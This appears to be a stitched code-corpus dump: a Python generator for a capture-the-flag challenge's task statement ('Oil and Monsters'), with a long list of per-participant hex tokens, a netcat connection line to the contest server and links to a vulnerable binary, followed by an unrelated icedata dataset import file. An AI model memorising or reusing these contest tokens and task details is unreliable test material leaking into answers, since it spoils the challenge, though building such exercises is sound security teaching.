'3fb001ebc9ed74357b1de05105f1c756', 'f0947fbdbe653e37e97b562c4845cf8c', 'ea529841a0b3a1775b06dacb64f68f06', 'e3c0b41df4977ca263b840914d4d5be5', '53c2ace67283e328aba03fbde32ff8ba', 'c9e912de394227acf77d88ea767decc8', 'cf0aa58106be6ccde4b34e074d1c606d', 'f9b47c241e1d80b4cedfa5c92439c775', '36b1eb93500904edda2d6a7d61892f34', '141352930793c38ad0f9dc2921ab0866', '81e3e80b0c426b7d992f648f4d31548c', '9f953e4db28fdaeb7b70d2d291028dca', '799c00773136ce6ec7c87b6fe80e07e6', '27e062316ea549a504de9fa62d0a0169', 'a127c99e725b96eeba0cfe351b3f98b7', 'ed5144e122bc1e57f6286165eb8aaebe', 'bd10330da2d1d5d229c7d851c0de3905', '7bd475b8df562625f1836356735ea6f7', '070d05d3c4cbdf65a6ca0726c043ddbf', '4ad9f5ed26c454d772872023f538eae4', '09678b3317d87b382e3cb3a6e6677863', '0cf703d93f72a4d21aaff9485aed15e2', 'd564363e6bdc23ac2d801814a805ee2d', '3257b3ef3bb4808d08a3d43888827652', 'd3d4c49dd108c1c8d4039d1516a40e56', '2cc38aa75f40560926bc9b2dd954e67a', '76c3bf7d3f4fade32a96133fb40b00c0', 'c25c43cc3e7338eddadd77d1d93abaea', 'ce274bddeba84ee78a9defa881261f14', 'ab18cc1be87793fdadcf2e633129d618', '694d83d7e6f7950f2fe9395660b14355', 'e2c00ab9e54a801b9b29c3b53a73b334', '804a3fe03d29c728c44a406e6d89b83a', '3dea7f666398f30b78e9c6f3b93a3943', '880db93668839e95744afd8d7516e51d', '27cce8a0dc57a2cf1707b7dbe51ba7f6', 'c4ae4e4eb421d3bd48f81c095285d297', '9668a4f5eaf7b734ffb09c69b36be469', 'ebffcd8b34cc5d0936d0f5cbad6ba1e5', 'ae539cea0a9002557e2c4882c1dd3c12', 'f27117b8b79627e9181a624329db19fc', '372cc5f1c948cd348739ee7cbdc93ddf', '3f8d9ab150c8696f89e9ce4f758ede22', '8e6531df338307914ca34b285067c2d4', 
'f16f2439a48530f51d795da1c87e90b0', 'e148f75a898982f501f8cebbe139a556', '625d4d0fe3d64ec6b2602891cfdf7321', 'fdf2c925b7f69b4f93eff9dbff8d8856', '3309476312d3333b0a8ac2f54adb4c7d', 'd8a112dd1e919414ebff02f0903e26f5', '846ef7c0650afa3cb4ee02f3a5649886', '2f78bd12c0e1514942046c1ade55b49b', '85504443aa79fea678e1bce6a39880ef', 'be8806bea6053fb5c9a6a665e8e6ef32', '14a4b500e8cc5a1b419ff3e6a84ee405', '97dfe08a9d10a380de9c33c4cbc3d6b1', 'e407520827040c1b0fdc04978b74e821', 'b624698e681babba1c6f2e4b6cb475a3', 'a39243c32aed493108592a3c30ff8b36', '66a51f76cb00137a6401eead0122b8f6', 'e4f3968c4ecd54425d29e756389d4cf3', '1bad3ba8ed3e8d587a28002f5f21f530', 'eb9125a64c87bd75fe6969cffd720aea', '8ca9596170c14e768b56459c0e2426c8', '71a3acb766e071458e728d2d0b36868e', 'c06e5ad0af4d590a057e9899262ee099', '8c5ab48a73734728196ae9f783d508dd', 'ee4fa87ce36a01e5268f78328bc43023', '510fbe67084400c8c56eb0a3c82664ee', 'a9bd33a453ba6d46196b816c44f3d7f4', '565e4869f313a762aacfb634afabafb1', 'db1e291e8cee993170032da98639a27d', 'ab73ac707781ced0910c74a7b2500be9', 'a6242e892b9df2453983ce1ccde8018f', '0c61ba5657e09d1d46ad1ec736a808d7', 'a90acb5355ee7dba5f34855564a57f72', 'fa6aa1bd20630e5eb142d12094a542a5', '1a6c859f07b3856d51b018a7a58bafc6', 'ae042b639c36615d70ae937e25578e2d', '30613591116d636934d531e45a05dfd7', '51aee96181b3d5dfec6dda308258e6fc', '9ed63572fa558826116fbc0c7b2d0924', '9e2ffe54a58756b3e245b59bdea88624', '0d861c3822a04baad01d3794208b1a7c', '3d8723263683b63633a7db83eaa0e837', 'd898c0606ec704e990021be322d95ff6', '5da9c8f94997720bed036e78c55d708b', 'fda23db0bfa811832783fbd2970a32e2', '68ac7240e1496ada12de9763c256d153', '9e440b393cce91f6b32b3707ccbe96e9', 'b5ef8a29b69f538a24245f3eca992cad', '88cd8eb33200b6a3a5b617ada26b5872', 'a6aab1ed4c62b9e85044f431a36674c4', '440eb23ccf06dbbfb4ddd733db1340b7', '629fa9029cc463d02bc7a4c443d25d2a', '166a55e7e64d548cfd378c79967cb4c2', '98d950ce41e612af650c77cb21b643ba', '61b435432bc6e63ce22d16cbefb0f95c', '3ad2924184c7176ad07ae36bf91df6a4', '56d85f978c275047713536fb4e004d08', 'ca1d6ecc1cb268cec53d9534c2b2a8f4', '58bd1d63663c3e796720e16ac52ab629', 'cae9f2ecb8bac418a86065584b85e5c9', 'b746e38e353f726e72a73582e1f3e162', '17391c9331ba3fa83113ffa46f972027', 'f1c5b54921c836247d3fad0ac82d6d57', 'fa6d299f04401d6f31496b44313418b2', '36d55624a58999d56a71b614353b1f94', 'ce68b0f8d195c17364c2c6b4ee813f7e', 'bd2782ee924797238cc82ceea014c85c', '1ddfb7e59489dd10e09cf852c77d7a7e', 'dc3a32cafe5a01df31f4b741d5e2d35f', 'f39ce9fa962ad59bc5418b8ade41f926', '938e8a1019f0aa43bd4de45881843121', 'd696cf7c3b2b6a87f62f45e18034d1ac', '477268678fc3c0bf71c32e7572234a41', '86ecd6249dffee007242943ed25cc2f0', 'c47be783145d6d8a0cb9e6e8b48b98fd', '6d5c991f86bbc89165efc152ff5d64fc', '2aecbcef4694d08bff759fa16f1db841', 'c8797ae1efe9b89f4b9883c38a83b368', '2dedd00ae63f31b4a9cb81ea5763cbe5', 'bc0045ca6d709441b85068ea060db17f', '5362c6a88ea3f9a850eb55f0dd9048f9', '407ee87e5b2776254bd543f09758c8be', '9bed515d3e6a7126ec78f9c914881799', '970b04491046b144effbeea8b654803b', 'bab6be31310cec55330514670b5359bd', '17ad1260fc56307ac0b5d0d9e085b1c5', 'f6643c7b7c17b13c34a4db4fd95b4df5', 'da57f218a00b8a01d6db83aaefe10c69', '1819e2b1a28f8529dfe24be95df33720', '1e0d798c96ee456e71f0d8be9a8e11d7', 'bb4cc0fc61f3dce0c0e89aa104f878e1', 'c31d1c993afeae70349584bc3dd90dc2', 'e32d98ede07c91698f6e2e489724b7eb', '7fddadfe8c18db9830680b0371422827', '95ead949f5d155b654a6eb891b271f51', '72b1ed98db448c3d204da639267facea', '18909b993a022af8230fded25d3abf11', '1d8753358acf4a88b485920100e1f710', '32cd763d4e4affebc7c9a0f5e42b2b1a', 
'bcac46407cd0f1c838cd128c6b1d30f3', 'ef3656509ddba876f61e3a5cd7064e31', 'b1b0599ed4393fad56a3906630a1bc95', 'a2c54d13bedc780548276622a9735cde', '3ff56a4e67f82bae67dae4a045777375', '9109bf9c0b130baf9ff3d1a927a52b3f', 'c1f7dd8d2af14a35c76e4b79504403b4', 'c619a3166acaa2e855108c2f18750cfb', '1cf2455b2e6309712009dfdcd8b04c19', 'e3c1943af1a7c8a7e17cfcc0307e57b7']
TITLE = "Oil and Monsters"
STATEMENT_TEMPLATE = '''
Things used to be fine, back in the day. There were none of these crazy monsters that get harder to hide from every day.
The air carried no creeping smell of radiation, and in the sky, yes, that very sky, a bright sun always shone.
Before the catastrophe, an acquaintance of mine owned a couple of oil wells that he had stumbled upon
while building his farm. He was thrilled, of course; I would have been thrilled with a windfall like that too.
Anyway, he was sure he would find more wells, so he wrote a program so that he would always know
how much oil each of his wells held.
The oil was fine, fair enough, but as a programmer he was, to put it mildly, not a good one. People said
that through that very program of his you could somehow take control of the wells, and some even managed to.
Nobody has any use for those wells now, but on his server you can find something useful...
To get the flag, run **getflag** and pass it your token as the first argument.
Your token: `{0}`
Example: `./getflag {0}`
`nc oil.contest.qctf.ru 20001`
[oil](/static/files/w12b28c7aq/oil)
[oil.c](/static/files/w12b28c7aq/oil.c)
'''
def generate(context):
    # `context` and TaskStatement are supplied by the contest framework.
    participant = context['participant']
    token = tokens[participant.id % len(tokens)]  # deterministic per-participant token
    return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
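# A hypothetical stand-alone check (TaskStatement and the participant object
# are normally provided by the contest framework; the stubs below are
# stand-ins for illustration only):
if __name__ == "__main__":
    from collections import namedtuple
    TaskStatement = namedtuple("TaskStatement", ["title", "statement"])  # hypothetical stub
    Participant = namedtuple("Participant", ["id"])                      # hypothetical stub
    print(generate({"participant": Participant(id=7)}).statement)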
| avg_line_length: 552.914286 | max_line_length: 18,009 | alphanum_fraction: 0.880271 | (remaining per-file qsc_* quality signals omitted)
| hexsha: d3fbe0e60092a265b507994235de7efa82f63fcc | size: 282 | ext: py | lang: Python
| max_stars/max_issues/max_forks repo_path: icedata/datasets/__init__.py | repo_name: ganesh3/icedata | repo_head_hexsha: 16c26ea3d8f96b99357683849d6bd363bf12a827 | licenses: ["Apache-2.0"]
| max_stars_count: 42 (2020-09-14T18:28:02.000Z to 2022-03-30T19:55:10.000Z) | max_issues_count: 103 (2020-09-11T19:50:29.000Z to 2022-03-15T13:07:10.000Z) | max_forks_count: 19 (2020-09-11T19:26:50.000Z to 2022-03-15T13:09:44.000Z)
from icedata.datasets import birds
from icedata.datasets import coco
from icedata.datasets import fridge
from icedata.datasets import pennfudan
from icedata.datasets import pets
from icedata.datasets import voc
from icedata.datasets import biwi
from icedata.datasets import ochuman
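if __name__ == "__main__":
    # Hedged usage sketch (not part of the original __init__.py). icedata's
    # documented pattern is that each dataset module exposes load_data(),
    # which downloads the dataset and returns its local path; treat the exact
    # call below as an assumption about that API rather than a guarantee.
    data_dir = pets.load_data()
    print(data_dir)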
| avg_line_length: 31.333333 | max_line_length: 38 | alphanum_fraction: 0.858156 | (remaining per-file qsc_* quality signals omitted)